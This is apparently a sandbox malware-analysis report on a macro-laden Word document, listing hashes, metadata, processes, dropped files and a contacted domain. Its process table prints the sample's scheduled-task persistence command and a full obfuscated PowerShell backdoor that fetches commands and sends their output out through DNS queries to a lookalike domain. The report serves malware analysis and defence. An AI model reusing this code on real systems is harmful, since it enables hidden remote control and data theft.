File name: | a3ae8972e68a86067afcf60c88240a19b0d6419bc55f0a56d39ee58ea88410ae |
Full analysis: | https://app.any.run/tasks/a78bfb65-1af5-4a55-869e-8e0df5d59c31 |
Verdict: | Malicious activity |
Analysis date: | February 11, 2019, 09:35:44 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.openxmlformats-officedocument.wordprocessingml.document |
File info: | Microsoft Word 2007+ |
MD5: | 3346698F95929B5FF3AEE454E400C427 |
SHA1: | 5B5FAEB145D572EA07B2A0D7740CE8E010A3072D |
SHA256: | A3AE8972E68A86067AFCF60C88240A19B0D6419BC55F0A56D39EE58EA88410AE |
SSDEEP: | 12288:o2NVJRBKwEwB9s6Lv4ixxZULLYvk28tAad12+Z6JcD9bZ0450YgX5hXBChnxv2rS:lJRBCwbD4i5UosHR2+ZtR9F50N5hXUh/ |
.docm | | | Word Microsoft Office Open XML Format document (with Macro) (53.6) |
---|---|---|
.docx | | | Word Microsoft Office Open XML Format document (24.2) |
.zip | | | Open Packaging Conventions container (18) |
.zip | | | ZIP compressed archive (4.1) |
Description: | - |
---|---|
Creator: | Windows User |
Subject: | - |
Title: | - |
ModifyDate: | 2019:02:04 11:46:00Z |
---|---|
CreateDate: | 2019:02:04 08:36:00Z |
RevisionNumber: | 4 |
LastModifiedBy: | Windows User |
Keywords: | - |
AppVersion: | 16 |
HyperlinksChanged: | No |
SharedDoc: | No |
CharactersWithSpaces: | 6086 |
LinksUpToDate: | No |
Company: | - |
TitlesOfParts: | - |
HeadingPairs: |
|
ScaleCrop: | No |
Paragraphs: | 12 |
Lines: | 43 |
DocSecurity: | None |
Application: | Microsoft Office Word |
Characters: | 5188 |
Words: | 910 |
Pages: | 3 |
TotalEditTime: | 3 minutes |
Template: | Normal |
ZipFileName: | [Content_Types].xml |
---|---|
ZipUncompressedSize: | 1503 |
ZipCompressedSize: | 399 |
ZipCRC: | 0x3f450766 |
ZipModifyDate: | 1980:01:01 00:00:00 |
ZipCompression: | Deflated |
ZipBitFlag: | 0x0006 |
ZipRequiredVersion: | 20 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2976 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\a3ae8972e68a86067afcf60c88240a19b0d6419bc55f0a56d39ee58ea88410ae.docm" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2528 | schtasks /create /sc minute /mo 1 /tn GppgleTaskUpdate /tr c:\users\public\temporyfile.vbs | C:\Windows\system32\schtasks.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2280 | C:\Windows\System32\WScript.exe "c:\users\public\temporyfile.vbs" | C:\Windows\System32\WScript.exe | — | taskeng.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
3388 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -command function HgX($oCE,$Kls,$vPd){([System.Net.Dns]::GetHostAddresses((((-join((65..90)+(97..122)|Get-Random -Count 5|%{[char]$_}))+(RKW $Kls)+(RKW('g2970'))+$vPd+$oCE+'.microsoft-check.com')))|Select-Object 'IPAddressToString').IPAddressToString} function RKW($tdE){for($FIQ=0;$FIQ-lt$tdE.length;$FIQ++){$WXT='{0:X}'-f([int]$tdE[$FIQ]);$hEv+=$WXT}return $hEv} $oCE=(HgX '' 'q' '');if(($oCE.split('.')[0])-eq92){$Kls='';$vPd=100;$npQ='';for($dkp=1;$dkp-le($oCE.split('.')[1]);$dkp++){$QGx='';while($QGx-eq''){$QGx=(HgX '' 'h' (RKW([string]$vPd)))}$Kls+=$QGx+'.';$vPd+=1};foreach($qoI in $Kls.Split('.')){$npQ+=[char][int]$qoI}[string]$Wvk=(cmd /c($npQ-replace'%',' ')) [int]$QYl=$Wvk.length/10;$Saj=0;$WtL=0;$IBW=New-Object System.Collections.ArrayList;for($syg=0;$syg-le$QYl;$syg++){$Saj+=10;$wva='';foreach($MLa in $Wvk[$WtL..$Saj]){$wva+=$MLa}$WtL=$Saj+1;$IBW.Add($wva)}$lAU=100;HgX $IBW.Count 'c' '';foreach($qdg in $IBW){$lAU+=1;HgX(RKW([Convert]::ToBase64String(([System.Text.Encoding]::UTF8.GetBytes($qdg)))))'r'(RKW([string]$lAU))}HgX '' 'f' ''} | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | WScript.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2976 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR8D04.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3388 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NKSHXHILQ1QR90WY22MX.temp | — | |
MD5:— | SHA256:— | |||
2976 | WINWORD.EXE | C:\Users\admin\Desktop\~$ae8972e68a86067afcf60c88240a19b0d6419bc55f0a56d39ee58ea88410ae.docm | pgc | |
MD5:D792799421927D97DA2C06578295713F | SHA256:1520E05EF3AC27487A9AD874520A0D70D7AF283694F863819339750DEA29A947 | |||
3388 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1a4bfe.TMP | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
2976 | WINWORD.EXE | C:\users\public\temporyfile.vbs | text | |
MD5:88B392EE0539B08DD1CC7CC123761DD3 | SHA256:F91656C9E6B3F0034979A477E177A216D21CD69F8A8FF261698150763C3D3885 | |||
3388 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
2976 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:D3776522846C4B6622721A213F627EE5 | SHA256:8E2DCF38F19ECCF737AE9EA6BD5E5B275C5A2E6C1D2B001724727E08426E2174 | |||
2976 | WINWORD.EXE | C:\users\public\temporyfile.tmp | text | |
MD5:F75DA2067EBDBDA2442A09B8C25C41BF | SHA256:58D47E5204AB20D3DFE7701D089AAEE42EB7D039CABA17C5DCADB5902BE81125 | |||
2976 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:1BF4FB1FB6F1C260288413F56F261944 | SHA256:0409D38D5FEE81897FDFF1E514D972EFB64D6A538287563290438115E7EFEEF9 | |||
2976 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\a3ae8972e68a86067afcf60c88240a19b0d6419bc55f0a56d39ee58ea88410ae.docm.LNK | lnk | |
MD5:3A78E711CAD4094191F0077410E9D71A | SHA256:C6CC4710F64AE0818FA291B3C20F029CE5CA9300A73514C16A6FD5C3F6EE5673 |
Domain | IP | Reputation |
---|---|---|
PLekd716732393730.microsoft-check.com |
| unknown |